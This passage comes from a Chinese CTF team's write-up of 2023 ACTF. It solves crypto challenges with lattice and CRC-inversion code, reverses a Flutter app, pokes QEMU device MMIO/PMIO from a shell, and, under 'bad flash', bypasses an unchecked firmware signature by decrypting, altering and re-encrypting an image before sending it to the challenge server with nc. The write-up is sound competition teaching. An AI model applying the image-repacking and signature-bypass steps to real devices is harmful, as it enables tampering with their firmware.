            crc = (crc >> 1) ^^ (poly & -(crc & 1))
    return crc ^^ ((1 << 128) - 1)

def equivalent_affine_crc(crc = crc128, crc_bits = 128, target_bytes = 30):
    zero_crc = crc(target_bytes*b"\x00")
    target_bits = 8 * target_bytes
    v2n = lambda v: int(''.join(map(str, v)), 2)
    n2v = lambda n: vector(GF(2), bin(n)[2:].zfill(crc_bits))
    # n2v_t = lambda n: vector(GF(2), bin(n)[2:].zfill(target_bits))
    Affine_Matrix = []
    for i in range(target_bits):
        v = vector(GF(2), (j == i for j in range(target_bits)))
        value = crc(long_to_bytes(v2n(v),target_bytes)) ^^ zero_crc
        Affine_Matrix.append(n2v(value))
    Affine_Matrix=matrix(GF(2),Affine_Matrix).transpose()
    for i in range(target_bytes):
        v,w,k = [0]*target_bits,[0]*target_bits,[0]*target_bits
        v[i*8],w[i*8+1],k[i*8+2]=1,1,1
        v = vector(GF(2), v)
        w = vector(GF(2), w)
        k = vector(GF(2), k)
        Affine_Matrix = Affine_Matrix.stack(v)
        Affine_Matrix = Affine_Matrix.stack(w)
        Affine_Matrix = Affine_Matrix.stack(k)
    # crc affine function: crc_128(x) = M*x+ C
    return Affine_Matrix, n2v(zero_crc)

def crc_128_reverse(crc_value):
    M , C = equivalent_affine_crc()
    # crc affine function: crc_128(x) = M*x+ C
    v2n = lambda v: int(''.join(map(str, v)), 2)
    n2v = lambda n: vector(GF(2), bin(n)[2:].zfill(128))
    temp = n2v(crc_value)+C
    temp = vector(GF(2),list(temp)+[0,1,0]*30)
    print(M.ncols(),M.nrows(),len(temp))
    res = M.solve_right(temp)
    bas = M.right_kernel()
    K = len(bas.basis())
    for i in range(2<<K):
        tr = res+bas[i]
        s = long_to_bytes(v2n(tr))
#         print(s)
        if re.fullmatch(b'[A-Za-z0-9+/]*={0,2}', s):
            print(s)
            break
#     return long_to_bytes(v2n(res))
crc_128_reverse(0x1bff942435a8f7d5b2f76fc4735f168b ^^ ((1 << 128) - 1))
#HTSUZATLBQWGHRQPUFXZVYBPLCPOMB
#得到RGVhciBndWVzdCwgd2VsY29tZSB0byBDUkNSQyBNYWdpYyBIb3VzZSwgSWYgeW91IGlucHV0IAHTSUZATLBQWGHRQPUFXZVYBPLCPOMBLCB5b3Ugd2lsbCBnZXQgMHg5YzZhMTFmYmMwZTk3YjFmZmY1ODQ0ZmE4OGIxZWUyZA==

MidRSA

$$ED-k_1n_1=A\ED-an_2=B\ED-dn_3=C$$

存在这三个等式关系，其中D，A，B，C均为小于E的较小数.

这里相比于上面卡了4-6bits的界，所以爆破一下高位就行

$$E(h_d+d_0)-k_1n_1=h_a+A_0\E(h_d+d_0)-an_2=h_b+B_0\E(h_d+d_0)-dn_3=h_c+C_0$$

展开造一个类似的格，然后爆破就ok，时间上也是几分钟

for i in tqdm(range(70000,2^20)):
    t1 = bin(i)[2:].zfill(21)
    h = int('1'+t1[:3],2) << 0x23c
    h1 = int(t1[3:9],2) << 1338
    h2 = int(t1[9:15],2) << 1338
    h3 = int(t1[15:21],2) << 1338
    M = Matrix(QQ,[[-e,-e,-e,2^766,0,0,0,0],
                   [n1,0,0,0,0,0,0,0],
                   [0,n2,0,0,0,0,0,0],
                   [0,0,n3,0,0,0,0,0],
                   [-h*e,-h*e,-h*e,0,2^(1338),0,0,0],
                   [-h1,0,0,0,0,2^1338,0,0],
                   [0,-h2,0,0,0,0,2^1338,0],
                   [0,0,-h3,0,0,0,0,2^1338]])
    # e_*d_-k1*n1,n1
    res = M.LLL()
    d = int(res[0][3]//2^766) + h
    if b'ACTF' in long_to_bytes(ZZ(pow(c,d,n1))):
        print(long_to_bytes(ZZ(pow(c,d,n1))))

Rev

native app

flutter题，用https://github.com/worawit/blutter 分析libapp.so可以解出dart代码及偏移量

[closure] void _onChanged(dynamic, String) {
  // ** addr: 0x1e0588, size: -0x1
}
[closure] void _onSubmit(dynamic, String) {
  // ** addr: 0x1e03c4, size: -0x1
}
[closure] void _onLongPressed(dynamic) {
  // ** addr: 0x1deba8, size: -0x1
}
[closure] void _onTap(dynamic) {
  // ** addr: 0x1de4b8, size: -0x1
}

其中_onChanged对应将输入框内容同步到文本框，_onSubmit对应输入法确认按钮在文本框对应提交操作，_onTap和_onLongPressed分别对应提交按钮的点击和长按。

经测试发现操作序列为提交、点按、长按。提交和点按分别对应State里两个String成员字段的赋值，之后按钮长按事件最为可疑，其中调用函数为sub_1DEBF0()，观察其函数内部的流程图，将StackOverflowSharedWithoutFPUR()视为异常分支，可以理解该函数主体为一循环。

输入”abc”，ida断点在0x1DEC60观察边界条件，可发现w0是0x44，w1是0x06，其中w0是预期字符串长度，w1是当前字符长度，结合Dart的SMI整数表示特点，预期的字符串长度实际为0x44/2=0x22即34个字符。

输入34个随机字符（大小写字母+数字）继续测试发现该循环对字符串进行了逐字符比较，在界面上输出false或true。并且每个字符被映射到的字节值和字符所在位置有关，构造映射表不可行。尝试若干字符后，发现映射前后大致存在线性关系，存在二分法加速暴力枚举的可能性。故通过断点在单个字符判断条件上暴力得到flag：Iu2xpwXLAK734btEt9kXIhfpRgTlu6KuI0

qemu-playground-1

要调内核吗，没看懂什么意思

怎么感觉下面这个是加密函数

一些shell读写mmio、pmio技巧：

查看设备mmio、pmio地址范围：cat /sys/devices/pci0000:00/0000:00:04.0/device
1
2
3
0x00000000febf1000 0x00000000febf1fff 0x0000000000040200
0x000000000000c040 0x000000000000c05f 0x0000000000040101
0x0000000000000000 0x0000000000000000 0x0000000000000000
- 第一行是mmio，地址从0x00000000febf1000到0x00000000febf1fff，4096bytes但似乎qemu代码里显示只能访问64bytes
- 第二行是pmio，地址从0x000000000000c040到0x000000000000c05f，可访问0x20bytes

访问mmio，注意你的地址可能和我的地址不一样

将mmio全部16*4bytes写0

START_ADDRESS=0xfebf1000
NUM_WORDS=16
i=0
while [ $i -lt $NUM_WORDS ]; do
    ADDRESS=$((START_ADDRESS + i * 4))
    devmem $ADDRESS 32 0 # 这里0是要写入的值
    i=$((i + 1))
done

读mmio

START_ADDRESS=0xfebf1000
NUM_WORDS=16
i=0
while [ $i -lt $NUM_WORDS ]; do
    ADDRESS=$((START_ADDRESS + i * 4))
    printf "Address: 0x%08x, Value: 0x%04x\n" $ADDRESS $(devmem $ADDRESS 32)
    i=$((i + 1))
done

访问pmio
- 读pmio地址空间里，0x0000c04及以后的内容
  1
  xxd /dev/port | grep -A 10 "0000c04"
- 写特定地址，下面是往pmio空间内偏移为0x1的地址写了一个0x1，从代码里看，往0x1这里写值会触发他的worker thread
  1
  echo -n -e "\x1" | dd of=/dev/port bs=1 seek=$((0xc040 + 0x1)) count=1 conv=notrunc status=none

z3写一下加密逻辑


# cipher = [0xABA29EC2A98DD89A, 0xBBF1B4AB81B4A9D4, 0xFB92A48DB386FFA8, 0xEFB491B8AFB4ABD3, 0x80EF69F1CBD00397, 0xB2EB07859CDA52D3, 0xEC9E22F5A5A07FA3, 0x4B36DF7B5B655A84]

cipher = b'\x9a\xd8\x8d\xa9\xc2\x9e\xa2\xab\xd4\xa9\xb4\x81\xab\xb4\xf1\xbb\xa8\xff\x86\xb3\x8d\xa4\x92\xfb\xd3\xab\xb4\xaf\xb8\x91\xb4\xef\x97\x03\xd0\xcb\xf1i\xef\x80\xd3R\xda\x9c\x85\x07\xeb\xb2\xa3\x7f\xa0\xa5\xf5"\x9e\xec\x84Ze[{\xdf6K'

# cipher = list(cipher)

# round_cnt = 10

# delta = 16
# xor_val = delta * (round_cnt - 1)

# for i in range(round_cnt // 2):
#     for j in range(0x20):
#         cipher[0x20 + j] ^= ((xor_val + j) & 0xff) ^ cipher[j]
#     xor_val -= delta
#     for j in range(0x20):
#         cipher[j] ^= ((xor_val + j) & 0xff) ^ cipher[j + 0x20]
#     xor_val -= delta

# print(bytes(cipher))

from z3 import *

xs = [BitVec(f'x{i}', 8) for i in range(0x40)]

order = xs.copy()

magic = 0x1234ac7f
iv = [0x7f, 0xac, 0x34, 0x12] * 8
# iv = [BitVec('iv', 8)] * 0x20

xor_val = 0
for i in range(10):
    base = i * 0x20
    for j in range(0x20):
        iv[j] = iv[j] ^ ((j + xor_val) & 0xff)
        xs.append(xs[base + j] ^ xs[base + j + 0x20] ^ iv[j])
    xor_val += 17

s = Solver()

cmp = xs[-0x40:]

assert(len(cmp) == 0x40)

for i in range(0x40):
    s.add(xs[i] <= 0x7f)
    s.add(xs[i] >= 0x20)
    s.add(cmp[i] == cipher[i])

if s.check() == sat:
    m = s.model()
    flag = []
    for i in order:
        flag.append(int(f'{m[i]}'))
    print(''.join(chr(i) for i in flag))
        # print(f"{i} : ")
else:
    print("no sol")

主要在于有个初值, 原本假设为0, 所以z3没跑出来, 后面用文档里的方案触发了加密函数, 调试看到了magic不是0

不懂为什么用pwn模板的pmio没法触发, 做pwn会比较麻烦

bad flash

nc发送的数据被作为程序的标准输入，分析发现接受两种类型的cmd，这里直接用shell语句构造。由于要求每个cmd总长度为256，这里用printf补0x00

FLASH指令，cmd后面要接要flash进去的image文件内容，FLASHSZ指定的是image文件的长度

1	nc 120.46.197.71 9999 < <(cat <(echo -n '.COMLEN:256.OP:FLASH.FLASHSZ:1048904.') <(printf '\x00%.0s' {1..219}) ./flash.img)

执行显示成功

> Start flashing...
IMG_ID: c68941c31d91260ccdcc8b05fc17c009
New banner program flashed.
>

ECHO指令，后面不需要跟image文件，但是也要求cmd总长256.

1	nc 120.46.197.71 9999 < <(cat <(echo -n '.COMLEN:256.OP:ECHO.FLASHSZ:0.') <(printf '\x00%.0s' {1..226}))

执行得到

1 2	> Fl4sh the device to display a welcome message. >

注意到可以一次nc里带多个cmd，例如先FLASH再ECHO，但是也没有什么变化。

1	nc 120.46.197.71 9999 < <(cat <(echo -n '.COMLEN:256.OP:FLASH.FLASHSZ:1048904.') <(printf '\x00%.0s' {1..219}) ./flash.img <(echo -n '.COMLEN:256.OP:ECHO.FLASHSZ:0.') <(printf '\x00%.0s' {1..226}))

以上FLASH过程在本地执行时报0x09错误，死在了verify_header()函数上，猜测是本地和远程的verify_header()实现不同，用binpatch掉这个verify_header()，本地跑可以跑到后面flash_to_file()生成/data/tmp-plain-img，其中没有flag，但是有个NOTICE提示flash过程是突破点。

分析image结构：

[0:72]是头信息
[72: 72+128]是RSA1024的签名，elf文件里含有4个公钥，用的是最后那个
[72+128: 72+128+128]是用RSA1024加密后的aes密钥，用gdb断点在aes_decrypt_image()上可以获得aes key和iv
[72+128+128: 末尾]是AES CBC mode加密的ext4文件，里面有一个NOTION文件提示了要替换/data/welcome，从/data/flag读出flag

分析发现负责签名验证的verify_signature()函数没有验签

可以拿gdb断点在aes_decrypt_image()上可以获得aes key和iv以及解密后的ext4文件。拿losetup和mount挂载这个ext4文件，然后编一个aarch64的elf文件换掉里面的/data/welcome然后umount。

再重新加密回去替换掉原来image文件的[72+128+128: 末尾]部分即可构造可以被远端接受的image：

from Crypto.Cipher import AES

key = bytes.fromhex('c510ba99d16f48a319e86b5ac572c4a933dec0656d8dfc77dc81867010c6401a')
iv = bytes.fromhex('b624b5e252a6b1805a5fc3374b5144c8')
myCipher = AES.new(key, AES.MODE_CBC, iv=iv)
# repack
with open('flash.img', 'rb') as file:
    bs = file.read()
with open('repacked_fs.bin', 'rb') as file:
    fs = file.read()
enfs = myCipher.encrypt(fs)

bs = bs[:72+128+128] + enfs

with open('repacked_flash.img', 'wb') as file:
    file.write(bs)

先FLASH再ECHO

nc 120.46.197.71 9999  < <(cat <(echo -n '.COMLEN:256.OP:FLASH.FLASHSZ:1048904.') <(printf '\x00%.0s' {1..219}) ./repacked_flash.img <(echo -n '.COMLEN:256.OP:ECHO.FLASHSZ:0.') <(printf '\x00%.0s' {1..226}))

2023 ACTF SU WriteUp

Web

craftcms

easy latex

hook

Ave Mujica’s Masquerade

mygo

story

Misc

东方原神大学

Viper

AMOP1

AMOP2(非预期未正确解出)

SLM

CTFer simulator

Pwn

master-of-orw

Blind

qemuplayground-2

Crypto

EasyRSA

MDH

claw crane

CRCRC

MidRSA

Rev

native app

qemu-playground-1

bad flash

2023 ACTF SU WriteUp

Web

craftcms

easy latex

hook

Ave Mujica’s Masquerade

mygo

story

Misc

东方原神大学

Viper

AMOP1

AMOP2(非预期 未正确解出)

SLM

CTFer simulator

Pwn

master-of-orw

Blind

qemuplayground-2

Crypto

EasyRSA

MDH

claw crane

CRCRC

MidRSA

Rev

native app ​

qemu-playground-1

bad flash

AMOP2(非预期未正确解出)

native app